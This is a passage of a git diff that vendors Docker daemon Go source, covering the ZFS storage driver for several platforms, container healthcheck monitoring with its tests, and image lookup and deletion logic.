+func (d *Driver) GetMetadata(id string) (map[string]string, error) {
+	return nil, nil
+}
+
+func (d *Driver) cloneFilesystem(name, parentName string) error {
+	snapshotName := fmt.Sprintf("%d", time.Now().Nanosecond())
+	parentDataset := zfs.Dataset{Name: parentName}
+	snapshot, err := parentDataset.Snapshot(snapshotName /*recursive */, false)
+	if err != nil {
+		return err
+	}
+
+	_, err = snapshot.Clone(name, map[string]string{"mountpoint": "legacy"})
+	if err == nil {
+		d.Lock()
+		d.filesystemsCache[name] = true
+		d.Unlock()
+	}
+
+	if err != nil {
+		snapshot.Destroy(zfs.DestroyDeferDeletion)
+		return err
+	}
+	return snapshot.Destroy(zfs.DestroyDeferDeletion)
+}
+
+func (d *Driver) zfsPath(id string) string {
+	return d.options.fsName + "/" + id
+}
+
+func (d *Driver) mountPath(id string) string {
+	return path.Join(d.options.mountPath, "graph", getMountpoint(id))
+}
+
+// CreateReadWrite creates a layer that is writable for use as a container
+// file system.
+func (d *Driver) CreateReadWrite(id, parent string, opts *graphdriver.CreateOpts) error {
+	return d.Create(id, parent, opts)
+}
+
+// Create prepares the dataset and filesystem for the ZFS driver for the given id under the parent.
+func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) error {
+	var storageOpt map[string]string
+	if opts != nil {
+		storageOpt = opts.StorageOpt
+	}
+
+	err := d.create(id, parent, storageOpt)
+	if err == nil {
+		return nil
+	}
+	if zfsError, ok := err.(*zfs.Error); ok {
+		if !strings.HasSuffix(zfsError.Stderr, "dataset already exists\n") {
+			return err
+		}
+		// aborted build -> cleanup
+	} else {
+		return err
+	}
+
+	dataset := zfs.Dataset{Name: d.zfsPath(id)}
+	if err := dataset.Destroy(zfs.DestroyRecursiveClones); err != nil {
+		return err
+	}
+
+	// retry
+	return d.create(id, parent, storageOpt)
+}
+
+func (d *Driver) create(id, parent string, storageOpt map[string]string) error {
+	name := d.zfsPath(id)
+	quota, err := parseStorageOpt(storageOpt)
+	if err != nil {
+		return err
+	}
+	if parent == "" {
+		mountoptions := map[string]string{"mountpoint": "legacy"}
+		fs, err := zfs.CreateFilesystem(name, mountoptions)
+		if err == nil {
+			err = setQuota(name, quota)
+			if err == nil {
+				d.Lock()
+				d.filesystemsCache[fs.Name] = true
+				d.Unlock()
+			}
+		}
+		return err
+	}
+	err = d.cloneFilesystem(name, d.zfsPath(parent))
+	if err == nil {
+		err = setQuota(name, quota)
+	}
+	return err
+}
+
+func parseStorageOpt(storageOpt map[string]string) (string, error) {
+	// Read size to change the disk quota per container
+	for k, v := range storageOpt {
+		key := strings.ToLower(k)
+		switch key {
+		case "size":
+			return v, nil
+		default:
+			return "0", fmt.Errorf("Unknown option %s", key)
+		}
+	}
+	return "0", nil
+}
+
+func setQuota(name string, quota string) error {
+	if quota == "0" {
+		return nil
+	}
+	fs, err := zfs.GetDataset(name)
+	if err != nil {
+		return err
+	}
+	return fs.SetProperty("quota", quota)
+}
+
+// Remove deletes the dataset, filesystem and the cache for the given id.
+func (d *Driver) Remove(id string) error {
+	name := d.zfsPath(id)
+	dataset := zfs.Dataset{Name: name}
+	err := dataset.Destroy(zfs.DestroyRecursive)
+	if err == nil {
+		d.Lock()
+		delete(d.filesystemsCache, name)
+		d.Unlock()
+	}
+	return err
+}
+
+// Get returns the mountpoint for the given id after creating the target directories if necessary.
+func (d *Driver) Get(id, mountLabel string) (string, error) {
+	mountpoint := d.mountPath(id)
+	if count := d.ctr.Increment(mountpoint); count > 1 {
+		return mountpoint, nil
+	}
+
+	filesystem := d.zfsPath(id)
+	options := label.FormatMountLabel("", mountLabel)
+	logrus.Debugf(`[zfs] mount("%s", "%s", "%s")`, filesystem, mountpoint, options)
+
+	rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps)
+	if err != nil {
+		d.ctr.Decrement(mountpoint)
+		return "", err
+	}
+	// Create the target directories if they don't exist
+	if err := idtools.MkdirAllAs(mountpoint, 0755, rootUID, rootGID); err != nil {
+		d.ctr.Decrement(mountpoint)
+		return "", err
+	}
+
+	if err := mount.Mount(filesystem, mountpoint, "zfs", options); err != nil {
+		d.ctr.Decrement(mountpoint)
+		return "", fmt.Errorf("error creating zfs mount of %s to %s: %v", filesystem, mountpoint, err)
+	}
+
+	// this could be our first mount after creation of the filesystem, and the root dir may still have root
+	// permissions instead of the remapped root uid:gid (if user namespaces are enabled):
+	if err := os.Chown(mountpoint, rootUID, rootGID); err != nil {
+		mount.Unmount(mountpoint)
+		d.ctr.Decrement(mountpoint)
+		return "", fmt.Errorf("error modifying zfs mountpoint (%s) directory ownership: %v", mountpoint, err)
+	}
+
+	return mountpoint, nil
+}
+
+// Put removes the existing mountpoint for the given id if it exists.
+func (d *Driver) Put(id string) error {
+	mountpoint := d.mountPath(id)
+	if count := d.ctr.Decrement(mountpoint); count > 0 {
+		return nil
+	}
+	mounted, err := graphdriver.Mounted(graphdriver.FsMagicZfs, mountpoint)
+	if err != nil || !mounted {
+		return err
+	}
+
+	logrus.Debugf(`[zfs] unmount("%s")`, mountpoint)
+
+	if err := mount.Unmount(mountpoint); err != nil {
+		return fmt.Errorf("error unmounting to %s: %v", mountpoint, err)
+	}
+	return nil
+}
+
+// Exists checks to see if the cache entry exists for the given id.
+func (d *Driver) Exists(id string) bool {
+	d.Lock()
+	defer d.Unlock()
+	return d.filesystemsCache[d.zfsPath(id)] == true
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_freebsd.go b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_freebsd.go
new file mode 100644
index 0000000000..1c05fa794c
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_freebsd.go
@@ -0,0 +1,38 @@
+package zfs
+
+import (
+	"fmt"
+	"strings"
+	"syscall"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/daemon/graphdriver"
+)
+
+func checkRootdirFs(rootdir string) error {
+	var buf syscall.Statfs_t
+	if err := syscall.Statfs(rootdir, &buf); err != nil {
+		return fmt.Errorf("Failed to access '%s': %s", rootdir, err)
+	}
+
+	// on FreeBSD buf.Fstypename contains ['z', 'f', 's', 0 ... ]
+	if (buf.Fstypename[0] != 122) || (buf.Fstypename[1] != 102) || (buf.Fstypename[2] != 115) || (buf.Fstypename[3] != 0) {
+		logrus.Debugf("[zfs] no zfs dataset found for rootdir '%s'", rootdir)
+		return graphdriver.ErrPrerequisites
+	}
+
+	return nil
+}
+
+func getMountpoint(id string) string {
+	maxlen := 12
+
+	// we need to preserve filesystem suffix
+	suffix := strings.SplitN(id, "-", 2)
+
+	if len(suffix) > 1 {
+		return id[:maxlen] + "-" + suffix[1]
+	}
+
+	return id[:maxlen]
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_linux.go b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_linux.go
new file mode 100644
index 0000000000..52ed516049
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_linux.go
@@ -0,0 +1,27 @@
+package zfs
+
+import (
+	"fmt"
+	"syscall"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/daemon/graphdriver"
+)
+
+func checkRootdirFs(rootdir string) error {
+	var buf syscall.Statfs_t
+	if err := syscall.Statfs(rootdir, &buf); err != nil {
+		return fmt.Errorf("Failed to access '%s': %s", rootdir, err)
+	}
+
+	if graphdriver.FsMagic(buf.Type) != graphdriver.FsMagicZfs {
+		logrus.Debugf("[zfs] no zfs dataset found for rootdir '%s'", rootdir)
+		return graphdriver.ErrPrerequisites
+	}
+
+	return nil
+}
+
+func getMountpoint(id string) string {
+	return id
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_solaris.go b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_solaris.go
new file mode 100644
index 0000000000..bb4a85bd64
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_solaris.go
@@ -0,0 +1,59 @@
+// +build solaris,cgo
+
+package zfs
+
+/*
+#include <sys/statvfs.h>
+#include <stdlib.h>
+
+static inline struct statvfs *getstatfs(char *s) {
+        struct statvfs *buf;
+        int err;
+        buf = (struct statvfs *)malloc(sizeof(struct statvfs));
+        err = statvfs(s, buf);
+        return buf;
+}
+*/
+import "C"
+import (
+	"path/filepath"
+	"strings"
+	"unsafe"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/daemon/graphdriver"
+)
+
+func checkRootdirFs(rootdir string) error {
+
+	cs := C.CString(filepath.Dir(rootdir))
+	buf := C.getstatfs(cs)
+
+	// on Solaris buf.f_basetype contains ['z', 'f', 's', 0 ... ]
+	if (buf.f_basetype[0] != 122) || (buf.f_basetype[1] != 102) || (buf.f_basetype[2] != 115) ||
+		(buf.f_basetype[3] != 0) {
+		logrus.Debugf("[zfs] no zfs dataset found for rootdir '%s'", rootdir)
+		C.free(unsafe.Pointer(buf))
+		return graphdriver.ErrPrerequisites
+	}
+
+	C.free(unsafe.Pointer(buf))
+	C.free(unsafe.Pointer(cs))
+	return nil
+}
+
+/* rootfs is introduced to comply with the OCI spec
+which states that root filesystem must be mounted at <CID>/rootfs/ instead of <CID>/
+*/
+func getMountpoint(id string) string {
+	maxlen := 12
+
+	// we need to preserve filesystem suffix
+	suffix := strings.SplitN(id, "-", 2)
+
+	if len(suffix) > 1 {
+		return filepath.Join(id[:maxlen]+"-"+suffix[1], "rootfs", "root")
+	}
+
+	return filepath.Join(id[:maxlen], "rootfs", "root")
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_test.go
new file mode 100644
index 0000000000..3e22928438
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_test.go
@@ -0,0 +1,35 @@
+// +build linux
+
+package zfs
+
+import (
+	"testing"
+
+	"github.com/docker/docker/daemon/graphdriver/graphtest"
+)
+
+// This avoids creating a new driver for each test if all tests are run
+// Make sure to put new tests between TestZfsSetup and TestZfsTeardown
+func TestZfsSetup(t *testing.T) {
+	graphtest.GetDriver(t, "zfs")
+}
+
+func TestZfsCreateEmpty(t *testing.T) {
+	graphtest.DriverTestCreateEmpty(t, "zfs")
+}
+
+func TestZfsCreateBase(t *testing.T) {
+	graphtest.DriverTestCreateBase(t, "zfs")
+}
+
+func TestZfsCreateSnap(t *testing.T) {
+	graphtest.DriverTestCreateSnap(t, "zfs")
+}
+
+func TestZfsSetQuota(t *testing.T) {
+	graphtest.DriverTestSetQuota(t, "zfs")
+}
+
+func TestZfsTeardown(t *testing.T) {
+	graphtest.PutDriver(t)
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_unsupported.go b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_unsupported.go
new file mode 100644
index 0000000000..ce8daadaf6
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_unsupported.go
@@ -0,0 +1,11 @@
+// +build !linux,!freebsd,!solaris
+
+package zfs
+
+func checkRootdirFs(rootdir string) error {
+	return nil
+}
+
+func getMountpoint(id string) string {
+	return id
+}
diff --git a/vendor/github.com/docker/docker/daemon/health.go b/vendor/github.com/docker/docker/daemon/health.go
new file mode 100644
index 0000000000..5b01dc0f40
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/health.go
@@ -0,0 +1,341 @@
+package daemon
+
+import (
+	"bytes"
+	"fmt"
+	"runtime"
+	"strings"
+	"sync"
+	"time"
+
+	"golang.org/x/net/context"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/api/types"
+	containertypes "github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/api/types/strslice"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/daemon/exec"
+)
+
+const (
+	// Longest healthcheck probe output message to store. Longer messages will be truncated.
+	maxOutputLen = 4096
+
+	// Default interval between probe runs (from the end of the first to the start of the second).
+	// Also the time before the first probe.
+	defaultProbeInterval = 30 * time.Second
+
+	// The maximum length of time a single probe run should take. If the probe takes longer
+	// than this, the check is considered to have failed.
+	defaultProbeTimeout = 30 * time.Second
+
+	// Default number of consecutive failures of the health check
+	// for the container to be considered unhealthy.
+	defaultProbeRetries = 3
+
+	// Maximum number of entries to record
+	maxLogEntries = 5
+)
+
+const (
+	// Exit status codes that can be returned by the probe command.
+
+	exitStatusHealthy   = 0 // Container is healthy
+	exitStatusUnhealthy = 1 // Container is unhealthy
+)
+
+// probe implementations know how to run a particular type of probe.
+type probe interface {
+	// Perform one run of the check. Returns the exit code and an optional
+	// short diagnostic string.
+	run(context.Context, *Daemon, *container.Container) (*types.HealthcheckResult, error)
+}
+
+// cmdProbe implements the "CMD" probe type.
+type cmdProbe struct {
+	// Run the command with the system's default shell instead of execing it directly.
+	shell bool
+}
+
+// exec the healthcheck command in the container.
+// Returns the exit code and probe output (if any)
+func (p *cmdProbe) run(ctx context.Context, d *Daemon, container *container.Container) (*types.HealthcheckResult, error) {
+
+	cmdSlice := strslice.StrSlice(container.Config.Healthcheck.Test)[1:]
+	if p.shell {
+		cmdSlice = append(getShell(container.Config), cmdSlice...)
+	}
+	entrypoint, args := d.getEntrypointAndArgs(strslice.StrSlice{}, cmdSlice)
+	execConfig := exec.NewConfig()
+	execConfig.OpenStdin = false
+	execConfig.OpenStdout = true
+	execConfig.OpenStderr = true
+	execConfig.ContainerID = container.ID
+	execConfig.DetachKeys = []byte{}
+	execConfig.Entrypoint = entrypoint
+	execConfig.Args = args
+	execConfig.Tty = false
+	execConfig.Privileged = false
+	execConfig.User = container.Config.User
+
+	d.registerExecCommand(container, execConfig)
+	d.LogContainerEvent(container, "exec_create: "+execConfig.Entrypoint+" "+strings.Join(execConfig.Args, " "))
+
+	output := &limitedBuffer{}
+	err := d.ContainerExecStart(ctx, execConfig.ID, nil, output, output)
+	if err != nil {
+		return nil, err
+	}
+	info, err := d.getExecConfig(execConfig.ID)
+	if err != nil {
+		return nil, err
+	}
+	if info.ExitCode == nil {
+		return nil, fmt.Errorf("Healthcheck for container %s has no exit code!", container.ID)
+	}
+	// Note: Go's json package will handle invalid UTF-8 for us
+	out := output.String()
+	return &types.HealthcheckResult{
+		End:      time.Now(),
+		ExitCode: *info.ExitCode,
+		Output:   out,
+	}, nil
+}
+
+// Update the container's Status.Health struct based on the latest probe's result.
+func handleProbeResult(d *Daemon, c *container.Container, result *types.HealthcheckResult, done chan struct{}) {
+	c.Lock()
+	defer c.Unlock()
+
+	// probe may have been cancelled while waiting on lock. Ignore result then
+	select {
+	case <-done:
+		return
+	default:
+	}
+
+	retries := c.Config.Healthcheck.Retries
+	if retries <= 0 {
+		retries = defaultProbeRetries
+	}
+
+	h := c.State.Health
+	oldStatus := h.Status
+
+	if len(h.Log) >= maxLogEntries {
+		h.Log = append(h.Log[len(h.Log)+1-maxLogEntries:], result)
+	} else {
+		h.Log = append(h.Log, result)
+	}
+
+	if result.ExitCode == exitStatusHealthy {
+		h.FailingStreak = 0
+		h.Status = types.Healthy
+	} else {
+		// Failure (including invalid exit code)
+		h.FailingStreak++
+		if h.FailingStreak >= retries {
+			h.Status = types.Unhealthy
+		}
+		// Else we're starting or healthy. Stay in that state.
+	}
+
+	if oldStatus != h.Status {
+		d.LogContainerEvent(c, "health_status: "+h.Status)
+	}
+}
+
+// Run the container's monitoring thread until notified via "stop".
+// There is never more than one monitor thread running per container at a time.
+func monitor(d *Daemon, c *container.Container, stop chan struct{}, probe probe) {
+	probeTimeout := timeoutWithDefault(c.Config.Healthcheck.Timeout, defaultProbeTimeout)
+	probeInterval := timeoutWithDefault(c.Config.Healthcheck.Interval, defaultProbeInterval)
+	for {
+		select {
+		case <-stop:
+			logrus.Debugf("Stop healthcheck monitoring for container %s (received while idle)", c.ID)
+			return
+		case <-time.After(probeInterval):
+			logrus.Debugf("Running health check for container %s ...", c.ID)
+			startTime := time.Now()
+			ctx, cancelProbe := context.WithTimeout(context.Background(), probeTimeout)
+			results := make(chan *types.HealthcheckResult)
+			go func() {
+				healthChecksCounter.Inc()
+				result, err := probe.run(ctx, d, c)
+				if err != nil {
+					healthChecksFailedCounter.Inc()
+					logrus.Warnf("Health check for container %s error: %v", c.ID, err)
+					results <- &types.HealthcheckResult{
+						ExitCode: -1,
+						Output:   err.Error(),
+						Start:    startTime,
+						End:      time.Now(),
+					}
+				} else {
+					result.Start = startTime
+					logrus.Debugf("Health check for container %s done (exitCode=%d)", c.ID, result.ExitCode)
+					results <- result
+				}
+				close(results)
+			}()
+			select {
+			case <-stop:
+				logrus.Debugf("Stop healthcheck monitoring for container %s (received while probing)", c.ID)
+				// Stop timeout and kill probe, but don't wait for probe to exit.
+				cancelProbe()
+				return
+			case result := <-results:
+				handleProbeResult(d, c, result, stop)
+				// Stop timeout
+				cancelProbe()
+			case <-ctx.Done():
+				logrus.Debugf("Health check for container %s taking too long", c.ID)
+				handleProbeResult(d, c, &types.HealthcheckResult{
+					ExitCode: -1,
+					Output:   fmt.Sprintf("Health check exceeded timeout (%v)", probeTimeout),
+					Start:    startTime,
+					End:      time.Now(),
+				}, stop)
+				cancelProbe()
+				// Wait for probe to exit (it might take a while to respond to the TERM
+				// signal and we don't want dying probes to pile up).
+				<-results
+			}
+		}
+	}
+}
+
+// Get a suitable probe implementation for the container's healthcheck configuration.
+// Nil will be returned if no healthcheck was configured or NONE was set.
+func getProbe(c *container.Container) probe {
+	config := c.Config.Healthcheck
+	if config == nil || len(config.Test) == 0 {
+		return nil
+	}
+	switch config.Test[0] {
+	case "CMD":
+		return &cmdProbe{shell: false}
+	case "CMD-SHELL":
+		return &cmdProbe{shell: true}
+	default:
+		logrus.Warnf("Unknown healthcheck type '%s' (expected 'CMD') in container %s", config.Test[0], c.ID)
+		return nil
+	}
+}
+
+// Ensure the health-check monitor is running or not, depending on the current
+// state of the container.
+// Called from monitor.go, with c locked.
+func (d *Daemon) updateHealthMonitor(c *container.Container) {
+	h := c.State.Health
+	if h == nil {
+		return // No healthcheck configured
+	}
+
+	probe := getProbe(c)
+	wantRunning := c.Running && !c.Paused && probe != nil
+	if wantRunning {
+		if stop := h.OpenMonitorChannel(); stop != nil {
+			go monitor(d, c, stop, probe)
+		}
+	} else {
+		h.CloseMonitorChannel()
+	}
+}
+
+// Reset the health state for a newly-started, restarted or restored container.
+// initHealthMonitor is called from monitor.go and we should never be running
+// two instances at once.
+// Called with c locked.
+func (d *Daemon) initHealthMonitor(c *container.Container) {
+	// If no healthcheck is setup then don't init the monitor
+	if getProbe(c) == nil {
+		return
+	}
+
+	// This is needed in case we're auto-restarting
+	d.stopHealthchecks(c)
+
+	if h := c.State.Health; h != nil {
+		h.Status = types.Starting
+		h.FailingStreak = 0
+	} else {
+		h := &container.Health{}
+		h.Status = types.Starting
+		c.State.Health = h
+	}
+
+	d.updateHealthMonitor(c)
+}
+
+// Called when the container is being stopped (whether because the health check is
+// failing or for any other reason).
+func (d *Daemon) stopHealthchecks(c *container.Container) {
+	h := c.State.Health
+	if h != nil {
+		h.CloseMonitorChannel()
+	}
+}
+
+// Buffer up to maxOutputLen bytes. Further data is discarded.
+type limitedBuffer struct {
+	buf       bytes.Buffer
+	mu        sync.Mutex
+	truncated bool // indicates that data has been lost
+}
+
+// Append to limitedBuffer while there is room.
+func (b *limitedBuffer) Write(data []byte) (int, error) {
+	b.mu.Lock()
+	defer b.mu.Unlock()
+
+	bufLen := b.buf.Len()
+	dataLen := len(data)
+	keep := min(maxOutputLen-bufLen, dataLen)
+	if keep > 0 {
+		b.buf.Write(data[:keep])
+	}
+	if keep < dataLen {
+		b.truncated = true
+	}
+	return dataLen, nil
+}
+
+// The contents of the buffer, with "..." appended if it overflowed.
+func (b *limitedBuffer) String() string {
+	b.mu.Lock()
+	defer b.mu.Unlock()
+
+	out := b.buf.String()
+	if b.truncated {
+		out = out + "..."
+	}
+	return out
+}
+
+// If configuredValue is zero, use defaultValue instead.
+func timeoutWithDefault(configuredValue time.Duration, defaultValue time.Duration) time.Duration {
+	if configuredValue == 0 {
+		return defaultValue
+	}
+	return configuredValue
+}
+
+func min(x, y int) int {
+	if x < y {
+		return x
+	}
+	return y
+}
+
+func getShell(config *containertypes.Config) []string {
+	if len(config.Shell) != 0 {
+		return config.Shell
+	}
+	if runtime.GOOS != "windows" {
+		return []string{"/bin/sh", "-c"}
+	}
+	return []string{"cmd", "/S", "/C"}
+}
diff --git a/vendor/github.com/docker/docker/daemon/health_test.go b/vendor/github.com/docker/docker/daemon/health_test.go
new file mode 100644
index 0000000000..7e82115d43
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/health_test.go
@@ -0,0 +1,118 @@
+package daemon
+
+import (
+	"testing"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	containertypes "github.com/docker/docker/api/types/container"
+	eventtypes "github.com/docker/docker/api/types/events"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/daemon/events"
+)
+
+func reset(c *container.Container) {
+	c.State = &container.State{}
+	c.State.Health = &container.Health{}
+	c.State.Health.Status = types.Starting
+}
+
+func TestNoneHealthcheck(t *testing.T) {
+	c := &container.Container{
+		CommonContainer: container.CommonContainer{
+			ID:   "container_id",
+			Name: "container_name",
+			Config: &containertypes.Config{
+				Image: "image_name",
+				Healthcheck: &containertypes.HealthConfig{
+					Test: []string{"NONE"},
+				},
+			},
+			State: &container.State{},
+		},
+	}
+	daemon := &Daemon{}
+
+	daemon.initHealthMonitor(c)
+	if c.State.Health != nil {
+		t.Errorf("Expecting Health to be nil, but was not")
+	}
+}
+
+func TestHealthStates(t *testing.T) {
+	e := events.New()
+	_, l, _ := e.Subscribe()
+	defer e.Evict(l)
+
+	expect := func(expected string) {
+		select {
+		case event := <-l:
+			ev := event.(eventtypes.Message)
+			if ev.Status != expected {
+				t.Errorf("Expecting event %#v, but got %#v\n", expected, ev.Status)
+			}
+		case <-time.After(1 * time.Second):
+			t.Errorf("Expecting event %#v, but got nothing\n", expected)
+		}
+	}
+
+	c := &container.Container{
+		CommonContainer: container.CommonContainer{
+			ID:   "container_id",
+			Name: "container_name",
+			Config: &containertypes.Config{
+				Image: "image_name",
+			},
+		},
+	}
+	daemon := &Daemon{
+		EventsService: e,
+	}
+
+	c.Config.Healthcheck = &containertypes.HealthConfig{
+		Retries: 1,
+	}
+
+	reset(c)
+
+	handleResult := func(startTime time.Time, exitCode int) {
+		handleProbeResult(daemon, c, &types.HealthcheckResult{
+			Start:    startTime,
+			End:      startTime,
+			ExitCode: exitCode,
+		}, nil)
+	}
+
+	// starting -> failed -> success -> failed
+
+	handleResult(c.State.StartedAt.Add(1*time.Second), 1)
+	expect("health_status: unhealthy")
+
+	handleResult(c.State.StartedAt.Add(2*time.Second), 0)
+	expect("health_status: healthy")
+
+	handleResult(c.State.StartedAt.Add(3*time.Second), 1)
+	expect("health_status: unhealthy")
+
+	// Test retries
+
+	reset(c)
+	c.Config.Healthcheck.Retries = 3
+
+	handleResult(c.State.StartedAt.Add(20*time.Second), 1)
+	handleResult(c.State.StartedAt.Add(40*time.Second), 1)
+	if c.State.Health.Status != types.Starting {
+		t.Errorf("Expecting starting, but got %#v\n", c.State.Health.Status)
+	}
+	if c.State.Health.FailingStreak != 2 {
+		t.Errorf("Expecting FailingStreak=2, but got %d\n", c.State.Health.FailingStreak)
+	}
+	handleResult(c.State.StartedAt.Add(60*time.Second), 1)
+	expect("health_status: unhealthy")
+
+	handleResult(c.State.StartedAt.Add(80*time.Second), 0)
+	expect("health_status: healthy")
+	if c.State.Health.FailingStreak != 0 {
+		t.Errorf("Expecting FailingStreak=0, but got %d\n", c.State.Health.FailingStreak)
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/image.go b/vendor/github.com/docker/docker/daemon/image.go
new file mode 100644
index 0000000000..32a8d77432
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/image.go
@@ -0,0 +1,76 @@
+package daemon
+
+import (
+	"fmt"
+
+	"github.com/docker/docker/builder"
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/docker/reference"
+)
+
+// ErrImageDoesNotExist is error returned when no image can be found for a reference.
+type ErrImageDoesNotExist struct {
+	RefOrID string
+}
+
+func (e ErrImageDoesNotExist) Error() string {
+	return fmt.Sprintf("no such id: %s", e.RefOrID)
+}
+
+// GetImageID returns an image ID corresponding to the image referred to by
+// refOrID.
+func (daemon *Daemon) GetImageID(refOrID string) (image.ID, error) {
+	id, ref, err := reference.ParseIDOrReference(refOrID)
+	if err != nil {
+		return "", err
+	}
+	if id != "" {
+		if _, err := daemon.imageStore.Get(image.IDFromDigest(id)); err != nil {
+			return "", ErrImageDoesNotExist{refOrID}
+		}
+		return image.IDFromDigest(id), nil
+	}
+
+	if id, err := daemon.referenceStore.Get(ref); err == nil {
+		return image.IDFromDigest(id), nil
+	}
+
+	// deprecated: repo:shortid https://github.com/docker/docker/pull/799
+	if tagged, ok := ref.(reference.NamedTagged); ok {
+		if tag := tagged.Tag(); stringid.IsShortID(stringid.TruncateID(tag)) {
+			if id, err := daemon.imageStore.Search(tag); err == nil {
+				for _, namedRef := range daemon.referenceStore.References(id.Digest()) {
+					if namedRef.Name() == ref.Name() {
+						return id, nil
+					}
+				}
+			}
+		}
+	}
+
+	// Search based on ID
+	if id, err := daemon.imageStore.Search(refOrID); err == nil {
+		return id, nil
+	}
+
+	return "", ErrImageDoesNotExist{refOrID}
+}
+
+// GetImage returns an image corresponding to the image referred to by refOrID.
+func (daemon *Daemon) GetImage(refOrID string) (*image.Image, error) {
+	imgID, err := daemon.GetImageID(refOrID)
+	if err != nil {
+		return nil, err
+	}
+	return daemon.imageStore.Get(imgID)
+}
+
+// GetImageOnBuild looks up a Docker image referenced by `name`.
+func (daemon *Daemon) GetImageOnBuild(name string) (builder.Image, error) {
+	img, err := daemon.GetImage(name)
+	if err != nil {
+		return nil, err
+	}
+	return img, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/image_delete.go b/vendor/github.com/docker/docker/daemon/image_delete.go
new file mode 100644
index 0000000000..3e3c142e9c
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/image_delete.go
@@ -0,0 +1,412 @@
+package daemon
+
+import (
+	"fmt"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/api/errors"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/docker/reference"
+)
+
+type conflictType int
+
+const (
+	conflictDependentChild conflictType = (1 << iota)
+	conflictRunningContainer
+	conflictActiveReference
+	conflictStoppedContainer
+	conflictHard = conflictDependentChild | conflictRunningContainer
+	conflictSoft = conflictActiveReference | conflictStoppedContainer
+)
+
+// ImageDelete deletes the image referenced by the given imageRef from this
+// daemon. The given imageRef can be an image ID, ID prefix, or a repository
+// reference (with an optional tag or digest, defaulting to the tag name
+// "latest"). There is differing behavior depending on whether the given
+// imageRef is a repository reference or not.
+//
+// If the given imageRef is a repository reference then that repository
+// reference will be removed. However, if there exists any containers which
+// were created using the same image reference then the repository reference
+// cannot be removed unless either there are other repository references to the
+// same image or force is true. Following removal of the repository reference,
+// the referenced image itself will attempt to be deleted as described below
+// but quietly, meaning any image delete conflicts will cause the image to not
+// be deleted and the conflict will not be reported.
+//
+// There may be conflicts preventing deletion of an image and these conflicts
+// are divided into two categories grouped by their severity:
+//
+// Hard Conflict:
+// 	- a pull or build using the image.
+// 	- any descendant image.
+// 	- any running container using the image.
+//
+// Soft Conflict:
+// 	- any stopped container using the image.
+// 	- any repository tag or digest references to the image.
+//
+// The image cannot be removed if there are any hard conflicts and can be
+// removed if there are soft conflicts only if force is true.
+//
+// If prune is true, ancestor images will each attempt to be deleted quietly,
+// meaning any delete conflicts will cause the image to not be deleted and the
+// conflict will not be reported.
+//
+// FIXME: remove ImageDelete's dependency on Daemon, then move to the graph
+// package. This would require that we no longer need the daemon to determine
+// whether images are being used by a stopped or running container.
+func (daemon *Daemon) ImageDelete(imageRef string, force, prune bool) ([]types.ImageDelete, error) {
+	start := time.Now()
+	records := []types.ImageDelete{}
+
+	imgID, err := daemon.GetImageID(imageRef)
+	if err != nil {
+		return nil, daemon.imageNotExistToErrcode(err)
+	}
+
+	repoRefs := daemon.referenceStore.References(imgID.Digest())
+
+	var removedRepositoryRef bool
+	if !isImageIDPrefix(imgID.String(), imageRef) {
+		// A repository reference was given and should be removed
+		// first. We can only remove this reference if either force is
+		// true, there are multiple repository references to this
+		// image, or there are no containers using the given reference.
+		if !force && isSingleReference(repoRefs) {
+			if container := daemon.getContainerUsingImage(imgID); container != nil {
+				// If we removed the repository reference then
+				// this image would remain "dangling" and since
+				// we really want to avoid that the client must
+				// explicitly force its removal.
+				err := fmt.Errorf("conflict: unable to remove repository reference %q (must force) - container %s is using its referenced image %s", imageRef, stringid.TruncateID(container.ID), stringid.TruncateID(imgID.String()))
+				return nil, errors.NewRequestConflictError(err)
+			}
+		}
+
+		parsedRef, err := reference.ParseNamed(imageRef)
+		if err != nil {
+			return nil, err
+		}
+
+		parsedRef, err = daemon.removeImageRef(parsedRef)
+		if err != nil {
+			return nil, err
+		}
+
+		untaggedRecord := types.ImageDelete{Untagged: parsedRef.String()}
+
+		daemon.LogImageEvent(imgID.String(), imgID.String(), "untag")
+		records = append(records, untaggedRecord)
+
+		repoRefs = daemon.referenceStore.References(imgID.Digest())
+
+		// If a tag reference was removed and the only remaining
+		// references to the same repository are digest references,
+		// then clean up those digest references.
+		if _, isCanonical := parsedRef.(reference.Canonical); !isCanonical {
+			foundRepoTagRef := false
